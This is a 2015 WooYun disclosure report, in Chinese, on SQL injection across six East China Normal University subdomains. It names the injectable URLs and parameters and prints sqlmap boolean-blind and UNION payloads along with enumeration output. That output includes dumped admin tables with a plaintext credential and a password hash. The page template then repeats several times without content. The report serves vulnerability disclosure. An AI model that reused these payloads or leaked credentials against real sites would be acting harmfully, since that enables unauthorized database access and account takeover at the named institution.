华东师范大学多站存在SQL注入 | wooyun-2015-0154632| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154632

漏洞标题：华东师范大学多站存在SQL注入

漏洞作者：路人甲

提交时间：2015-11-21 16:53

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-21：细节已通知厂商并且等待厂商处理中
2015-11-23：厂商已经确认，细节仅向厂商公开
2015-12-03：细节向核心白帽子及相关领域专家公开
2015-12-13：细节向普通白帽子公开
2015-12-23：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

华东师范大学多站存在SQL注入

详细说明：

1.
华东师范大学基础教育研究新视野存在SQL注入

注入点：http://www.deduold.ecnu.edu.cn/show.aspx?info_id=2149&info_lb=98&flag=98

sqlmap identified the following injection point(s) with a total of 82 HTTP(s) requests:
---
Parameter: info_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=2149 AND 5478=5478&info_lb=98&flag=98
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: info_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=2149 AND 5478=5478&info_lb=98&flag=98
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[1 table]
+------+
| menu |
+------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: info_id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: info_id=2149 AND 5478=5478&info_lb=98&flag=98
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP.NET 2.0.50727, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
Table: menu
[4 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| fid    | numeric     |
| id     | numeric     |
| menu   | non-numeric |
| power  | non-numeric |
+--------+-------------+

2.注入点id：
http://sbc.ecnu.edu.cn/detail.asp?id=2655&typetitle=%E9%83%A8%E9%97%A8%E6%A6%82%E5%86%B5&title=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81&n=1

sqlmap identified the following injection point(s) with a total of 31 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2655 AND 2970=2970&typetitle=%E9%83%A8%E9%97%A8%E6%A6%82%E5%86%B5&title=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81&n=1
    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: id=-1038 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(118)&CHR(118)&CHR(113)&CHR(113)&CHR(108)&CHR(81)&CHR(107)&CHR(97)&CHR(86)&CHR(114)&CHR(107)&CHR(98)&CHR(99)&CHR(103)&CHR(113)&CHR(107)&CHR(113)&CHR(106)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&typetitle=%E9%83%A8%E9%97%A8%E6%A6%82%E5%86%B5&title=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81&n=1
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2655 AND 2970=2970&typetitle=%E9%83%A8%E9%97%A8%E6%A6%82%E5%86%B5&title=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81&n=1
    Type: UNION query
    Title: Generic UNION query (NULL) - 12 columns
    Payload: id=-1038 UNION ALL SELECT NULL,NULL,CHR(113)&CHR(118)&CHR(118)&CHR(113)&CHR(113)&CHR(108)&CHR(81)&CHR(107)&CHR(97)&CHR(86)&CHR(114)&CHR(107)&CHR(98)&CHR(99)&CHR(103)&CHR(113)&CHR(107)&CHR(113)&CHR(106)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16&typetitle=%E9%83%A8%E9%97%A8%E6%A6%82%E5%86%B5&title=%E6%96%B0%E9%97%BB%E5%8A%A8%E6%80%81&n=1
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[1 table]
+----------+
| tb_admin |
+----------+

管理员表和内容

Table: tb_admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| data     | non-numeric |
| id       | numeric     |
| pwd      | non-numeric |
| username | non-numeric |
+----------+-------------+
Table: tb_admin
[1 entry]
+----+--------------+------+----------+
| id | pwd          | data | username |
+----+--------------+------+----------+
| 1  | admin:sbc123 | <blank> | admin    |
+----+--------------+------+----------+

明文存储，好像不太应该哈！
3.注入点：
http://sklec.ecnu.edu.cn/forecast/Development.asp?id=6

sqlmap identified the following injection point(s) with a total of 57 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=6 AND 6900=6900
    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: id=-3337 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(118)&CHR(118)&CHR(113)&CHR(113)&CHR(101)&CHR(116)&CHR(119)&CHR(103)&CHR(71)&CHR(113)&CHR(97)&CHR(104)&CHR(98)&CHR(97)&CHR(113)&CHR(112)&CHR(107)&CHR(118)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=6 AND 6900=6900
    Type: UNION query
    Title: Generic UNION query (NULL) - 16 columns
    Payload: id=-3337 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CHR(113)&CHR(118)&CHR(118)&CHR(113)&CHR(113)&CHR(101)&CHR(116)&CHR(119)&CHR(103)&CHR(71)&CHR(113)&CHR(97)&CHR(104)&CHR(98)&CHR(97)&CHR(113)&CHR(112)&CHR(107)&CHR(118)&CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM MSysAccessObjects%16
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[5 tables]
+---------+
| ad      |
| article |
| contact |
| manager |
| news    |
+---------+

Table: manager
[4 columns]
+----------------+-------------+
| Column         | Type        |
+----------------+-------------+
| admin_name     | non-numeric |
| admin_password | non-numeric |
| data           | non-numeric |
| id             | numeric     |
+----------------+-------------+
Database: Microsoft_Access_masterdb
Table: manager
[1 entry]
+----+------+------------+------------------+
| id | data | admin_name | admin_password   |
+----+------+------------+------------------+
| 1  | <blank> | admin      | 9edd2238da801275 |
+----+------+------------+------------------+

漏洞证明：

4.注入点：
http://www.bs.ecnu.edu.cn/newshow.asp?id=935

sqlmap identified the following injection point(s) with a total of 81 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=935 AND 7426=7426
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=935 AND 7426=7426
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
Database: Microsoft_Access_masterdb
[8 tables]
+----------+
| user     |
| admin    |
| download |
| feedback |
| market   |
| news     |
| product  |
| vote     |
+----------+

Table: admin
[5 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| user     | non-numeric |
| id       | numeric     |
| password | non-numeric |
| title    | non-numeric |
| username | non-numeric |
+----------+-------------+

总共123条记录：

用户表：

Table: user
[12 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| user     | non-numeric |
| email    | non-numeric |
| homepage | non-numeric |
| id       | numeric     |
| logins   | numeric     |
| mobile   | non-numeric |
| password | non-numeric |
| phone    | numeric     |
| question | non-numeric |
| title    | non-numeric |
| userid   | numeric     |
| username | non-numeric |
+----------+-------------+

5.http://lifeold.ecnu.edu.cn/sites/bioteacher/content.asp?id=1604&belong=syjx
http://lifeold.ecnu.edu.cn/sites/bioteacher/swjsjyw.asp?belong=jxzy

sqlmap identified the following injection point(s) with a total of 83 HTTP(s) requests:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1604 AND 1088=1088&belong=syjx
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft Access
sqlmap identified the following injection point(s) with a total of 84 HTTP(s) requests:
---
Parameter: belong (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: belong=jxzy' AND 6266=6266 AND 'dJeN'='dJeN
---
web server operating system: Windows 2008 or Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft Access

6.注入点：
http://eng.ecnu.edu.cn/news.php?tid=5

sqlmap identified the following injection point(s) with a total of 282 HTTP(s) requests:
---
Parameter: tid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tid=5 AND 8121=8121
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.5
back-end DBMS: MySQL >= 5.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: tid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tid=5 AND 8121=8121
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.5
back-end DBMS: MySQL 5
available databases [1]:
[*] english_manage
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: tid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tid=5 AND 8121=8121
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.5
back-end DBMS: MySQL 5
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: tid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: tid=5 AND 8121=8121
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.5
back-end DBMS: MySQL 5
available databases [1]:
[*] english_manage

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2015-11-23 15:31

厂商回复：

通知二级单位处理

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154632

漏洞标题：华东师范大学多站存在SQL注入

相关厂商：华东师范大学

漏洞作者：路人甲

提交时间：2015-11-21 16:53

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154632

漏洞标题：华东师范大学多站存在SQL注入

相关厂商：华东师范大学

漏洞作者： 路人甲

提交时间：2015-11-21 16:53

修复时间：2016-01-11 15:32

公开时间：2016-01-11 15:32

漏洞类型：SQL注射漏洞

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0154632"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云